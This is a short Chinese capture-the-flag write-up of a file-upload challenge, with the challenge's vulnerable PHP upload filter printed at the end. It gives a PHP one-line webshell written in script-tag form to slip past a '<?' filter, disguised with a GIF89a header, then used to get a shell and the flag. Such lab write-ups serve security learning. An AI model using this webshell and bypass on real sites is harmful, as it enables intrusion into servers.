1、上传合适的文件,但是png不行
2、上传一句话木马,但是过滤了<?
3、上传这个<script language=php>eval($_POST[1])</script>
一句话木马,前几天刚遇到类似问题,好在还没忘记。
4、添加GIF89a
5、
6、
7、
8、
9、访问,getshell
10、flag
11、连蚁剑,看源码
<?php
$file = $_FILES["file"];
// 允许上传的图片后缀
$allowedExts = array("php","php2","php3","php4","php5","pht","phtm");
$temp = explode(".", $file["name"]);
$extension = strtolower(end($temp)); // 获取文件后缀名
$image_type = @exif_imagetype($file["tmp_name"]);
if ((($file["type"] == "image/gif")
|| ($file["type"] == "image/jpeg")
|| ($file["type"] == "image/jpg")
|| ($file["type"] == "image/pjpeg")
|| ($file["type"] == "image/x-png")
|| ($file["type"] == "image/png"))
&&$file["size"] < 20480) // 小于 20 kb
{
if ($file["error"] > 0){
echo "ERROR!!!";
}
elseif (in_array($extension, $allowedExts)) {
echo "NOT!".$extension."!";
}
elseif (mb_strpos(file_get_contents($file["tmp_name"]), "<?") !== FALSE) {
echo "NO! HACKER! your file included '<?'";
}
elseif (!$image_type) {
echo "Don't lie to me, it's not image at all!!!";
}
else{
$fileName='./upload/'.$file['name'];
move_uploaded_file($file['tmp_name'],$fileName);
echo "上传文件名: " . $file["name"] . "<br>";
}
}
else
{
echo "Not image!";
}
?>